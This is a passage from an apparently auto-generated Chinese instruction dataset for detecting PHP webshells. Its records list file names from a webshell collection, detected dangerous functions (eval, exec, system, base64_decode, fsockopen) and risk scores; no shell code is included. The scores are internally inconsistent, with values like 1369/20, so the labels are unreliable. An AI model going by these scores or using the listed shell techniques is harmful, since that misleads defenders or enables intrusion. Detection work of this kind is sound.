"xl7dev-webshell/Php/r57_iFX.php", "malicious_score": 1058, "md5_hash": "513b7be8bd0595c377283a7c87b44b2e"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"SimAttacker - Version 1.0.0 - Edited By KingDefacer.php\", \"文件类型\": \"php\", \"文件大小\": \"11991 bytes\", \"行数\": 754}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: shell_exec(, $_GET[, $_POST[, exec(, passthru( 包含网络功能: fsockopen 具备文件操作能力: fopen\\s*\\(, move_uploaded_file, unlink\\s*\\( 恶意度评分: 77/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/SimAttacker - Version 1.0.0 - Edited By KingDefacer.php", "malicious_score": 77, "md5_hash": "ca5ea9f6d07dcbbca8843e488991564f"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"lostDC shell.php\", \"文件类型\": \"php\", \"文件大小\": \"19828 bytes\", \"行数\": 475}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, exec(, system(, $_POST[, fwrite ( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 62/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/lostDC shell.php", "malicious_score": 62, "md5_hash": "576ed018a4c2b4d6bf14d443e8caba50"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.php\", \"文件类型\": \"php\", \"文件大小\": \"5398 bytes\", \"行数\": 90}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, $_GET[ 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, copy\\s*\\( 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.php", "malicious_score": 15, "md5_hash": "b872cd934f96c5d179d7715036153d64"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php\", \"文件类型\": \"php\", \"文件大小\": \"11627 bytes\", \"行数\": 378}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: shell_exec(, $_GET[, $_POST[, exec(, passthru( 包含网络功能: fsockopen 具备文件操作能力: fopen\\s*\\(, move_uploaded_file, unlink\\s*\\( 恶意度评分: 77/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php", "malicious_score": 77, "md5_hash": "089ff24d978aeff2b4b2869f0c7d38a3"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cybershell.php\", \"文件类型\": \"php\", \"文件大小\": \"36185 bytes\", \"行数\": 1033}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, $_GET[, fwrite(, exec(, system( 发现混淆技术: base64_decode 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 145/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/cybershell.php", "malicious_score": 145, "md5_hash": "c3a964b9003936626764501b71aad8cd"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"phpshell17.php\", \"文件类型\": \"php\", \"文件大小\": \"5159 bytes\", \"行数\": 139}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: system(, exec( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/phpshell17.php", "malicious_score": 6, "md5_hash": "e3b461f7464d81f5022419d87315a90d"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"xnonymoux_webshell_ver_1.0.php\", \"文件类型\": \"php\", \"文件大小\": \"370693 bytes\", \"行数\": 46}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval(, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/xnonymoux_webshell_ver_1.0.php", "malicious_score": 8, "md5_hash": "321d974499bf76a9b1c6c65f80f09e8b"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"pHp一句话扫描脚本程序.php\", \"文件类型\": \"php\", \"文件大小\": \"4207 bytes\", \"行数\": 84}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[ 具备文件操作能力: fopen\\s*\\( 恶意度评分: 25/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/pHp一句话扫描脚本程序.php", "malicious_score": 25, "md5_hash": "b0e842bdf83396c3ef8c71ff94e64167"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"r57_kartal.php\", \"文件类型\": \"php\", \"文件大小\": \"98533 bytes\", \"行数\": 1883}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, fputs(, exec(, $_POST[ 发现混淆技术: base64_decode 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 1053/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/r57_kartal.php", "malicious_score": 1053, "md5_hash": "1d912c55b96e2efe8ca873d6040e3b30"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"r57shell127.php\", \"文件类型\": \"php\", \"文件大小\": \"108126 bytes\", \"行数\": 2287}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, $_COOKIE[, fputs(, exec( 发现混淆技术: base64_decode, pack\\s*\\(, chr\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 1369/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/r57shell127.php", "malicious_score": 1369, "md5_hash": "41c2362cfb176da0a1a5ae0cc4d685f0"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Mysql udf by M4ster.php\", \"文件类型\": \"php\", \"文件大小\": \"128986 bytes\", \"行数\": 3}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Mysql udf by M4ster.php", "malicious_score": 13, "md5_hash": "1617ff850aaa8c685347aa870d5e5fc1"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php\", \"文件类型\": \"php\", \"文件大小\": \"1373 bytes\", \"行数\": 34}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, shell_exec(, exec( 恶意度评分: 30/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php", "malicious_score": 30, "md5_hash": "3a0dbc33983777249db6cfe584618f12"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Small Shell - Edited By KingDefacer.php\", \"文件类型\": \"php\", \"文件大小\": \"15410 bytes\", \"行数\": 502}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_POST[, eval( 具备文件操作能力: fopen\\s*\\(, copy\\s*\\(, fwrite\\s*\\( 恶意度评分: 144/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Small Shell - Edited By KingDefacer.php", "malicious_score": 144, "md5_hash": "2c57bae30117b7f5c390c6c2b53dcf79"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Knull Shell.php\", \"文件类型\": \"php\", \"文件大小\": \"21574 bytes\", \"行数\": 567}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_COOKIE[, $_POST[, exec(, system( 发现混淆技术: base64_decode, chr\\s*\\( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\( 恶意度评分: 198/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Knull Shell.php", "malicious_score": 198, "md5_hash": "1bd6d6835296305ab21cd1ec34ab8627"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Confusion to encrypt php webshell.php\", \"文件类型\": \"php\", \"文件大小\": \"1232 bytes\", \"行数\": 41}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, eval(, base64_decode( 发现混淆技术: base64_decode 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\( 恶意度评分: 19/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Confusion to encrypt php webshell.php", "malicious_score": 19, "md5_hash": "94245fea5d26ffa88a4bd5560ae3e109"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Spider PHP Shell (SPS-3.0).php\", \"文件类型\": \"php\", \"文件大小\": \"127204 bytes\", \"行数\": 1953}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, file_get_contents(, $_GET[, fwrite(, $_COOKIE[ 发现混淆技术: base64_decode, gzinflate, pack\\s*\\( 包含网络功能: fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 1060/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Spider PHP Shell (SPS-3.0).php", "malicious_score": 1060, "md5_hash": "11e157b94bc84431633791199cb370e5"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"在线exp专用免杀版.php\", \"文件类型\": \"php\", \"文件大小\": \"117576 bytes\", \"行数\": 1607}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: preg_replace(\"/.*/e, $_GET[, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 14/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/在线exp专用免杀版.php", "malicious_score": 14, "md5_hash": "f5ffbafc978b3f8e0e9f1366a296b01a"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"spygrup.php\", \"文件类型\": \"php\", \"文件大小\": \"8233 bytes\", \"行数\": 182}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, $_GET[ 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, copy\\s*\\( 恶意度评分: 30/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/spygrup.php", "malicious_score": 30, "md5_hash": "08fbb8115c612d3f6461a03b56f328eb"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"PHP 搜索可读可写目录脚本.php\", \"文件类型\": \"php\", \"文件大小\": \"1313 bytes\", \"行数\": 51}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[ 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/PHP 搜索可读可写目录脚本.php", "malicious_score": 6, "md5_hash": "bc170a68ff7cb4a05a334be717b50736"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"A robust backdoor script made by Daniel Berliner.php\", \"文件类型\": \"php\", \"文件大小\": \"13485 bytes\", \"行数\": 429}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, file_get_contents(, $_GET[, fwrite(, $_COOKIE[ 发现混淆技术: base64_decode 具备文件操作能力: fopen\\s*\\(, move_uploaded_file, unlink\\s*\\( 恶意度评分: 171/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/A robust backdoor script made by Daniel Berliner.php", "malicious_score": 171, "md5_hash": "e57cd978725a081e84931961969ed528"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"PHPJackal v1.9.php\", \"文件类型\": \"php\", \"文件大小\": \"101820 bytes\", \"行数\": 1616}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, file_get_contents(, evaL(, fwrite( 发现混淆技术: base64_decode, ord\\s*\\(, chr\\s*\\( 包含网络功能: wget, fsockopen, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 1213/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/PHPJackal v1.9.php", "malicious_score": 1213, "md5_hash": "7b837f27b2cc0aa292620bc2c6ae2eb6"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"exp.php\", \"文件类型\": \"php\", \"文件大小\": \"117557 bytes\", \"行数\": 1607}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: preg_replace(\"/.*/e, $_GET[, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 14/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/exp.php", "malicious_score": 14, "md5_hash": "d2387e488e5477145947f9a4517f4f32"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"PHP Web Shell by oTTo.php\", \"文件类型\": \"php\", \"文件大小\": \"16001 bytes\", \"行数\": 501}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, system(, $_POST[, $_GET[ 包含网络功能: fsockopen 具备文件操作能力: fopen\\s*\\(, move_uploaded_file, unlink\\s*\\( 恶意度评分: 86/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/PHP Web Shell by oTTo.php", "malicious_score": 86, "md5_hash": "fca86637ac255c3603a42a38e1ff3593"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"c99_locus7s.php\", \"文件类型\": \"php\", \"文件大小\": \"232697 bytes\", \"行数\": 3595}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, file_get_contents(, $_GET[, fwrite(, $_COOKIE[ 发现混淆技术: base64_decode, ord\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 491/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/c99_locus7s.php", "malicious_score": 491, "md5_hash": "38fd7e45f9c11a37463c3ded1c76af4c"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Dive Shell 1.0 - Emperor Hacking Team.php\", \"文件类型\": \"php\", \"文件大小\": \"5512 bytes\", \"行数\": 187}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[ 恶意度评分: 48/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Dive Shell 1.0 - Emperor Hacking Team.php", "malicious_score": 48, "md5_hash": "1b5102bdc41a7bc439eea8f0010310a5"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"仗剑孤行搜索可读可写目录脚本.php\", \"文件类型\": \"php\", \"文件大小\": \"1363 bytes\", \"行数\": 51}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[ 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/仗剑孤行搜索可读可写目录脚本.php", "malicious_score": 6, "md5_hash": "d8cd501af297a82052c745d7e4b6dc13"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"navicat_tunnel.php\", \"文件类型\": \"php\", \"文件大小\": \"6765 bytes\", \"行数\": 236}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[ 发现混淆技术: pack\\s*\\(, chr\\s*\\( 恶意度评分: 52/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/navicat_tunnel.php", "malicious_score": 52, "md5_hash": "83bb08c4b77a0309da7365b3691cb7d5"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"robot.php\", \"文件类型\": \"php\", \"文件大小\": \"92181 bytes\", \"行数\": 35}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval(, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/robot.php", "malicious_score": 8, "md5_hash": "3b35074f8f406beba6e3184abc41aa99"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Ani-Shell.php\", \"文件类型\": \"php\", \"文件大小\": \"87075 bytes\", \"行数\": 2482}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, file_get_contents(, $_GET[, fwrite(, fputs( 发现混淆技术: base64_decode, gzinflate 包含网络功能: fsockopen, socket_create 具备文件操作能力: fopen\\s*\\(, move_uploaded_file, unlink\\s*\\( 恶意度评分: 562/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Ani-Shell.php", "malicious_score": 562, "md5_hash": "889bfc9fbb8ee7832044fc575324d01a"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"reverseshell-poc.php\", \"文件类型\": \"php\", \"文件大小\": \"2975 bytes\", \"行数\": 102}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: shell_exec(, fputs(, exec(, fputs (, base64_decode( 发现混淆技术: base64_decode 包含网络功能: fsockopen 恶意度评分: 60/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/reverseshell-poc.php", "malicious_score": 60, "md5_hash": "d0005805094e03f6c226cce5895878b3"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Loader'z WEB Shell v 0.1.0.2.php\", \"文件类型\": \"php\", \"文件大小\": \"13380 bytes\", \"行数\": 513}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, fputs(, exec(, $_POST[, system( 具备文件操作能力: fopen\\s*\\(, copy\\s*\\(, fwrite\\s*\\( 恶意度评分: 108/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Loader'z WEB Shell v 0.1.0.2.php", "malicious_score": 108, "md5_hash": "9987057e5fd0b19005a6172447d232a9"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"backdoorfr.php\", \"文件类型\": \"php\", \"文件大小\": \"8987 bytes\", \"行数\": 234}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, fwrite(, exec(, eval(, passthru( 发现混淆技术: chr\\s*\\( 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, fwrite\\s*\\( 恶意度评分: 56/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/backdoorfr.php", "malicious_score": 56, "md5_hash": "5fda888e2cf9abbe71ea299e154805ab"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"BLaSTER.php\", \"文件类型\": \"php\", \"文件大小\": \"10010 bytes\", \"行数\": 371}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, exec( 包含网络功能: curl_exec 恶意度评分: 55/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/BLaSTER.php", "malicious_score": 55, "md5_hash": "7a05cdee767f824205d881180c54395e"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"PHVayv.php\", \"文件类型\": \"php\", \"文件大小\": \"25274 bytes\", \"行数\": 597}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite( 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, mkdir\\s*\\( 恶意度评分: 10/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/PHVayv.php", "malicious_score": 10, "md5_hash": "ed360ac55c5ac7312a61170e53c6e35d"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Antichat Shell v1.3.php\", \"文件类型\": \"php\", \"文件大小\": \"8998 bytes\", \"行数\": 180}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_POST[ 发现混淆技术: ord\\s*\\(, chr\\s*\\( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\( 恶意度评分: 48/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Antichat Shell v1.3.php", "malicious_score": 48, "md5_hash": "40d0abceba125868be7f3f990f031521"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"AK-74 Security Team Web Shell Beta Version.php\", \"文件类型\": \"php\", \"文件大小\": \"20232 bytes\", \"行数\": 640}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, $_POST[, eval(, passthru( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 150/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/AK-74 Security Team Web Shell Beta Version.php", "malicious_score": 150, "md5_hash": "a9b712eee2ee5538f10d9e35060b325a"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"NCC-Shell.php\", \"文件类型\": \"php\", \"文件大小\": \"2652 bytes\", \"行数\": 60}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: Shell_Exec(, $_REQUEST[, $_GET[, Exec( 具备文件操作能力: move_uploaded_file 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/NCC-Shell.php", "malicious_score": 13, "md5_hash": "77970bda2a9061e9f48385ea6cca0699"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"c0derz shell [csh] v. 0.1.1 release.php\", \"文件类型\": \"php\", \"文件大小\": \"12984 bytes\", \"行数\": 334}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, $_POST[, exec(, system(, eval( 具备文件操作能力: copy\\s*\\( 恶意度评分: 43/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/c0derz shell [csh] v. 0.1.1 release.php", "malicious_score": 43, "md5_hash": "194a9d3f3eac8bc56d9a7c55c016af96"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"load_shell.php\", \"文件类型\": \"php\", \"文件大小\": \"14344 bytes\", \"行数\": 513}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, fputs(, exec(, $_POST[, system( 具备文件操作能力: fopen\\s*\\(, copy\\s*\\(, fwrite\\s*\\( 恶意度评分: 108/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/load_shell.php", "malicious_score": 108, "md5_hash": "50c523e3fb59d9b06b35078016a2be48"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"bypass safemodel.php\", \"文件类型\": \"php\", \"文件大小\": \"13615 bytes\", \"行数\": 643}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, $_POST[, exec(, system(, passthru( 恶意度评分: 42/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/bypass safemodel.php", "malicious_score": 42, "md5_hash": "bab69f265ae232bdaaf363a9330b3aef"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Worse Linux Shell.php.php\", \"文件类型\": \"php\", \"文件大小\": \"2455 bytes\", \"行数\": 69}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, system( 恶意度评分: 18/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/Worse Linux Shell.php.php", "malicious_score": 18, "md5_hash": "8338c8d9eab10bd38a7116eb534b5fa2"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"nshell.php\", \"文件类型\": \"php\", \"文件大小\": \"13188 bytes\", \"行数\": 371}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: Eval(, $_REQUEST[, $_GET[, fwrite(, $_POST[ 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\( 恶意度评分: 77/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Php/nshell.php", "malicious_score": 77, "md5_hash": "47309b6b6045618ccc87b49074594038"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"boffmax_v1.0_web_shell_by_the-c0de_team(1).php\", \"文件类型\": \"php\", \"文件大小\": \"50334 bytes\", \"行数\": 26}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: str_rot13(, gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate, str_rot13 恶意度评分: 18/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": 